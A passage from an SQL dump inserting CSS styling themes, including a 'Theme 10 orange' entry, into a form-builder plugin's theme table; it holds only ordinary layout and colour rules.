display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #E9B500 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\nborder-top: 1px solid #7F7F7F !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 1px solid #B7B7B7;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/09/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/09/next.png) no-repeat right;\r\n	padding: 0px 36px 0  20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/09/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #30D1B1;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\npadding:10px;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #013D7C;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 5px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #E9B500;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #7F7F7F !important;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 1px solid #B7B7B7;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: "";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/09/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8B8B8B;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #8B8B8B;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #808080;\r\nbackground-color: #E5E5E5;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-left:3px;\r\nmargin-bottom:2px;\r\n}\r\n.page_active {\r\n	color: #C2C2C2;\r\ncursor: pointer;\r\nbackground-color: #FFFFFF;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #7F7F7F;\r\nmargin-left:3px;\r\nmargin-bottom: -1px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nborder-spacing: 0px;\r\nheight: 10px;\r\nbackground: #E7C85C;\r\nfloat: left;\r\n}\r\n.page_percentage_deactive {\r\nheight: 10px;\r\nline-height: 20px;\r\nbackground-color: #E5E5E5;\r\ntext-align: left !important;\r\nmargin-bottom: 2px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\ncolor: #fff;\r\nfont-size: 12px;\r\nposition: relative;\r\nbackground: url([SITE_ROOT]/images/09/02/02.png) no-repeat;\r\nwidth: 36px;\r\ndisplay: inline-block;\r\nheight: 36px;\r\ntop: -37px;\r\nleft: 17px;\r\ntext-align: center;\r\nline-height: 27px;\r\nfloat: right;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}', 0);
INSERT INTO `cyb_formmaker_themes` (`id`, `title`, `css`, `default`) VALUES
(35, 'Theme 10 orange', '.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F7D3BB;\r\nborder: 1px solid #FAAA63;\r\nmargin-bottom: 10px;\r\ncolor: #FAAA63;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/01/01/next_hoverbg.png) url([SITE_ROOT]/images/01/01/previous_hover.png) url([SITE_ROOT]/images/01/01/next_hover.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #FFB471 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 7px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 26px;\r\n	line-height: 26px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 28px;\r\n	width: 32px;\r\n	background: url([SITE_ROOT]/images/01/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 1px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-page-and-images:after {\r\n	width: 100%;\r\n	content: "";\r\n	display: block;\r\n	height: 17px;\r\n	background: url([SITE_ROOT]/images/01/0.png) no-repeat center center;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -17px;\r\n	left: -50px;\r\n	padding-left: 100px;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 7px;\r\n	height: 27px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n//text-overflow: ellipsis;\r\n}\r\n.file-picker {\r\n	width: 38px;\r\n	height: 34px;\r\n	background: url([SITE_ROOT]/images/01/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #000;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/01/nextbg.png) no-repeat right center;\r\n	-webkit-background-size: cover;\r\n	-moz-background-size: cover;\r\n	-o-background-size: cover;\r\n	background-size: cover;\r\n	border-style: solid;\r\n	padding: 0px 15px;\r\n	vertical-align: middle;\r\n	border-color: transparent;\r\n}\r\ndiv.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/01/01/next_hoverbg.png) no-repeat right center;\r\n	-webkit-background-size: cover;\r\n	-moz-background-size: cover;\r\n	-o-background-size: cover;\r\n	background-size: cover;\r\n}\r\n.next-page div.wdform-page-button {\r\n	border-width: 0px 18px 0px 0px;\r\n	-moz-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	box-shadow: inset 51px 0px 8px -50px #636363;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	-moz-border-image: url([SITE_ROOT]/images/01/01/next_hover.png) 0 36 0 0 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/01/next_hover.png) 0 36 0 0 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/01/next_hover.png) 0 36 0 0 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/01/next_hover.png) 0 36 0 0 stretch;\r\n}\r\n.next-page:before {\r\n	content: "";\r\n	height: 56px;\r\n	vertical-align: middle;\r\n	background: url([SITE_ROOT]/images/01/shadow.png) no-repeat left center;\r\n	background-size: contain;\r\n	width: 7px;\r\n	display: inline-block;\r\n	position: relative;\r\n	left: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	border-width: 0px 0px 0px 18px;\r\n	-moz-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	box-shadow: inset -51px 0px 8px -50px #636363;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	-moz-border-image: url([SITE_ROOT]/images/01/01/previous_hover.png) 0 0 0 36 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/01/previous_hover.png) 0 0 0 36 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/01/previous_hover.png) 0 0 0 36 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/01/previous_hover.png) 0 0 0 36 stretch;\r\n}\r\n.previous-page:after {\r\n	content: "";\r\n	height: 56px;\r\n	vertical-align: middle;\r\n	background: url([SITE_ROOT]/images/01/shadow1.png) no-repeat right center;\r\n	background-size: contain;\r\n	width: 7px;\r\n	display: inline-block;\r\n	position: relative;\r\n	left: -7px;\r\n}\r\n.button-submit {\r\n	background: #f58b33; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #f58b33 0%, #faaa63 20%, #faaa63 80%, #f58b33 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #f58b33), color-stop(20%, #faaa63), color-stop(80%, #faaa63), color-stop(100%, #f58b33)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #f58b33 0%, #faaa63 20%, #faaa63 80%, #f58b33 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #f58b33 0%, #faaa63 20%, #faaa63 80%, #f58b33 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #f58b33 0%, #faaa63 20%, #faaa63 80%, #f58b33 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #f58b33 0%, #faaa63 20%, #faaa63 80%, #f58b33 100%); /* W3C */\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #8D5D35;\r\n	border: 1px solid #F0C579;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 1px 1px #EC8E37;\r\n	font-family: Segoe UI;\r\n	}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 1px solid #c9c9c9;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: #F7D3BB;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n	border-top: 2px solid #FFB471;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break2 {\r\n	background: url([SITE_ROOT]/images/01/shadow.png) no-repeat left center;\r\n	background-size: contain;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #e8a467; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #e8a467 1%, #ffb471 20%, #ffb471 80%, #ffcd72 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(1%, #e8a467), color-stop(20%, #ffb471), color-stop(80%, #ffb471), color-stop(100%, #ffcd72)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #e8a467 1%, #ffb471 20%, #ffb471 80%, #ffcd72 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #e8a467 1%, #ffb471 20%, #ffb471 80%, #ffcd72 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #e8a467 1%, #ffb471 20%, #ffb471 80%, #ffcd72 100%); /* IE10+ */\r\n	background: linear-gradient(to right, 